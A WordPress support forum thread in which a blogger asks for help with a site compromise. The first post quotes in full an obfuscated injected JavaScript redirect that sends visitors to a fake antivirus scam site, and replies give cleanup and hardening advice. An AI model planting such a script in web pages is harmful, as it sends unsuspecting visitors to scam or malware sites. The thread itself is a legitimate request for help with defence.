WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Hack/malware redirecting to another site (3 posts)

  1. nli
    Member
    Posted 4 years ago #

    I have two WordPress blogs which are under virtual subdomains on the same domain:

    http://aiheet.domnik.net/
    http://lr.domnik.net/

    (both are in Finnish)

    Now in both of them the content is occasionnally replaced with a malicious JavaScript code that redirects the browser to fake antivirus site computer-antivirus03.com.

    The content that the script writes over can be the blog home page, an individual post or page, and sometimes even a css style sheet. The script is not always the same, but looks somewhat like this:

    <script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); document.cookie="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script>
    <script type="text/javascript" language="javascript"> var iyssffn=new Array("ht\x74\x70://t\x68e-off\x73\x70\x72\x69\x6e\x67\x2e\x63\x6e/\x3f\x70i\x64\x3d1\x38\x30s0\x38\x26s\x69\x64\x3d3c\x357\x37\x39","\x68\x74tp:\x2f\x2f\x74h\x65-o\x66fsp\x72ing.c\x6e\x2f\x3fpi\x64\x3d\x31\x380\x73\x30\x39\x26si\x64\x3d3\x635\x377\x39"); var kumh="\143\x61,co\x2c\144\x61,de,c\x79,el\x2cen,\x65o,e\x73,fi\x2cfr\x2cga\x2ci\x74,j\x61,j\x69,\x6bn\x2cnl\x2cno\x2cpt\x2csv"; var wlmnfsc=navigator.language || navigator.systemLanguage; var lang=wlmnfsc.toLowerCase( ); lang=lang.substr(0,2); if (kumh.indexOf(lang)==-1){zeck( ); }else {eylgnov(omqmeq( )?iyssffn[0]:iyssffn[1]); }function eylgnov(hrnmj){if (top.location.href!=window.location.href){top.location=hrnmj; }else {document.writeln("\x3cM\x45\x54A \x48TTP-EQ\x55IV=47Re\x66res\x6847\x20C\x4fNT\x45N\x54=470;\x20UR\x4c="+hrnmj+"\x27>"); document.writeln("74meta ht\x74\160\x2dequiv\x3d47\x70ra\x67ma\x27 co\x6eten\x74=\x27no\x2dca\x63he\x27>"); document.writeln("\x3cmeta \x6e\141\x6de=47\x72o\x62ots\x27 con\x74en\x74=47noi\x6ede\x78,n\x6ff\x6fll\x6fw\x27>"); }}function zeck( ){eylgnov(omqmeq( )?iyssffn[2]:iyssffn[3]); return; }function omqmeq( ){alert(document.referrer); return document.referrer.indexOf("\x67oo\x67\x6ce.") || document.referrer.indexOf("\x79ahoo.") || document.referrer.indexOf("bi\x6eg."); } </script>

    It doesn't show up every time. Sometimes I have to browse around for a while before I can see it.

    For two more examples (first one is the same as above), see:

    http://www.domnik.net/x/temp/computer-antivirus03.txt

    What have I already done:

    I replaced all the core files in both blogs with brand new ones from new WordPress download (it was version 2.8.4 already when hacked).

    I examined my template files and didn't find anything suspicious.

    I removed all plugins that I don't use.

    I uploaded plugins Antivirus, WordPress Exploit Scanner and WP Security Scan to see if they find something. I corrected one chmod proposed by WP Security Scan (wp-admin/index.php to chmod 644). It also said "The file .htaccess does not exist in wp-admin/." Should I have one there?

    Exploit Scanner found some suspicious "String.fromCharCode" and "shell_exec" from several files but those seem to exist in clean WordPress files too.

    I have contacted my webhost (I am on shared hosting) and sent them basically the same info. No reply yet.

    I have changed all the password (they were random generated before and they are still random generated).

    I am the only one who has admin rights to the blogs and for last few months I have accessed them only from my own computer which runs Ubuntu. The other blog has one co-blogger but he has only editor rights.

    Any ideas how to proceed and get rid of the code?

  2. alism
    Member
    Posted 4 years ago #

    I think that there's a good possibility that your host just has security problems, but that's kinda difficult to prove.

    What else can you do then. Hmmm.

    Look through your server logs to see if you can spot anything suspicious.

    Scan any PC's, Macs or other boxes that might be infected with something and potentially snaffling your FTP password (although that's unlikely from what you describe I think).

    Check for other potentially insecure scripts running in your webspace.

    Look for other scripts/code that a hacker might've left behind as a backdoor (not necessarily hiding in WordPress directories).

    Triple check that you're the only one with Admin rights - does the number at the top of that page say (2), yet WordPress only displays yourself as an admin?

    Lock down your wp-admin directory with a htpasswd/htaccess.

    Errr, look to your host...

    There's some links at the bottom of this page worth reading too:
    http://wordpress.org/support/topic/307660?replies=1

  3. nli
    Member
    Posted 4 years ago #

    Thanks alism, you were right. It was security problem with my host, not a WordPress issue. They have resolved it now.

    Anyway, it was useful to learn something more about WordPress security too. I look into securing the wp-admin directory with .htaccess file and double-check the admin rights.

Topic Closed

This topic has been closed to new replies.

About this Topic